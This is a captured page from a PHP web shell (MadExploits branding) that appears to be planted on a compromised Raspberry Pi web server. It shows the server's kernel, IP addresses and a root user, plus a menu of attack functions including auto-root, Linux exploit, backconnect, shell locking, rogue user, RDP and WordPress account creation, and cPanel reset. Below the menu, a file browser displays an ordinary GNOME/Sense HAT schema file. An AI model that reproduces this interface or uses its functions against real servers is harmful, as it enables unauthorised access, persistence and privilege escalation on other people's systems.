Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
glib-2.0 /
schemas /
[ HOME SHELL ]
Name
Size
Permission
Action
10_desktop-base.gschema.overri...
260
B
-rw-r--r--
10_gsettings-desktop-schemas.g...
91
B
-rw-r--r--
gschemas.compiled
42.71
KB
-rw-r--r--
org.freedesktop.ColorHelper.gs...
1.46
KB
-rw-r--r--
org.gnome.desktop.a11y.applica...
845
B
-rw-r--r--
org.gnome.desktop.a11y.gschema...
828
B
-rw-r--r--
org.gnome.desktop.a11y.keyboar...
4.78
KB
-rw-r--r--
org.gnome.desktop.a11y.magnifi...
9.16
KB
-rw-r--r--
org.gnome.desktop.a11y.mouse.g...
2.84
KB
-rw-r--r--
org.gnome.desktop.app-folders....
1.8
KB
-rw-r--r--
org.gnome.desktop.background.g...
2.24
KB
-rw-r--r--
org.gnome.desktop.calendar.gsc...
427
B
-rw-r--r--
org.gnome.desktop.datetime.gsc...
439
B
-rw-r--r--
org.gnome.desktop.default-appl...
3.02
KB
-rw-r--r--
org.gnome.desktop.enums.xml
5.37
KB
-rw-r--r--
org.gnome.desktop.input-source...
2.49
KB
-rw-r--r--
org.gnome.desktop.interface.gs...
8.94
KB
-rw-r--r--
org.gnome.desktop.lockdown.gsc...
2.78
KB
-rw-r--r--
org.gnome.desktop.media-handli...
2.51
KB
-rw-r--r--
org.gnome.desktop.notification...
2.77
KB
-rw-r--r--
org.gnome.desktop.peripherals....
10.67
KB
-rw-r--r--
org.gnome.desktop.privacy.gsch...
3
KB
-rw-r--r--
org.gnome.desktop.screensaver....
5.83
KB
-rw-r--r--
org.gnome.desktop.search-provi...
1.86
KB
-rw-r--r--
org.gnome.desktop.session.gsch...
695
B
-rw-r--r--
org.gnome.desktop.sound.gschem...
1.03
KB
-rw-r--r--
org.gnome.desktop.thumbnail-ca...
600
B
-rw-r--r--
org.gnome.desktop.thumbnailers...
866
B
-rw-r--r--
org.gnome.desktop.wm.keybindin...
13.19
KB
-rw-r--r--
org.gnome.desktop.wm.preferenc...
12.6
KB
-rw-r--r--
org.gnome.online-accounts.gsch...
537
B
-rw-r--r--
org.gnome.system.dns_sd.gschem...
661
B
-rw-r--r--
org.gnome.system.gvfs.enums.xm...
457
B
-rw-r--r--
org.gnome.system.locale.gschem...
448
B
-rw-r--r--
org.gnome.system.location.gsch...
1.13
KB
-rw-r--r--
org.gnome.system.proxy.gschema...
6.2
KB
-rw-r--r--
org.gnome.system.smb.gschema.x...
418
B
-rw-r--r--
org.gtk.Settings.ColorChooser....
931
B
-rw-r--r--
org.gtk.Settings.EmojiChooser....
623
B
-rw-r--r--
org.gtk.Settings.FileChooser.g...
5.23
KB
-rw-r--r--
org.raspberrypi.sense_emu_gui....
3.34
KB
-rw-r--r--
org.rpi.pipackage.gschema.xml
5.2
KB
-rw-r--r--
org.xfce.mousepad.gschema.xml
15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : org.raspberrypi.sense_emu_gui.gschema.xml
<?xml version="1.0" encoding="UTF-8"?> <schemalist> <schema id="org.raspberrypi.sense_emu_gui" path="/org/raspberrypi/sense_emu_gui/" gettext-domain="sense-emu"> <key name="orientation-scale" type="s"> <default>'balance'</default> <summary>The scale used to display orientation angles</summary> <description>The scale used to display the yaw, pitch, and roll angles used to specify the Sense HAT's orientation. Internally these are always -180 to 180 degrees, but the interface can display alternate ranges such as 0 to 360 degrees.</description> <choices> <choice value="balance" /> <choice value="circle" /> <choice value="modulo" /> </choices> </key> <key name="simulate-env" type="b"> <default>true</default> <summary>Controls the environment simulation thread</summary> <description>When enabled, the temperature, pressure, and humidity settings will be constantly perturbed with a gaussian error. This costs a certain amount of processor time, and is disabled by default on lower end Pi models.</description> </key> <key name="simulate-imu" type="b"> <default>true</default> <summary>Controls the IMU simulation thread</summary> <description>When enabled, the orientation settings (yaw, pitch, and roll), along with the derived IMU settings (gyroscope, accelerometer, and compass) will be constantly perturbed with a gaussian error. This costs a certain amount of processor time, and is disabled by default on lower end Pi models.</description> </key> <key name="screen-fps" type="i"> <default>25</default> <summary>Limits the screen update rate</summary> <description>This is the maximum rate at which the screen will update. The actual HAT updates at 60fps, but this speed causes issues in the emulation on lower end Pi models, hence the default is 25fps (which is sufficient for most emulation purposes).</description> <range min="1" max="60" /> </key> <key name="window-width" type="i"> <default>-1</default> <summary>The width of the main window</summary> <description>Stores the width of the main window between invocations.</description> </key> <key name="window-height" type="i"> <default>-1</default> <summary>The height of the main window</summary> <description>Stores the height of the main window between invocations.</description> </key> <key name="window-maximized" type="b"> <default>false</default> <summary>The maximized state of the main window</summary> <description>Stores whether or not the main window is maximized.</description> </key> <key name="editor-command" type="s"> <default>'thonny'</default> <summary>The command to launch the script editor</summary> <description>When an example script is opened from the menu, this is the command that is executed to open the script editor (which may also be the environment that runs the script in the case of applications like IDLE and Thonny). If %s appears in this string, the script filename will be substituted for it; otherwise the script filename will be appended to the command line.</description> </key> </schema> </schemalist>
Close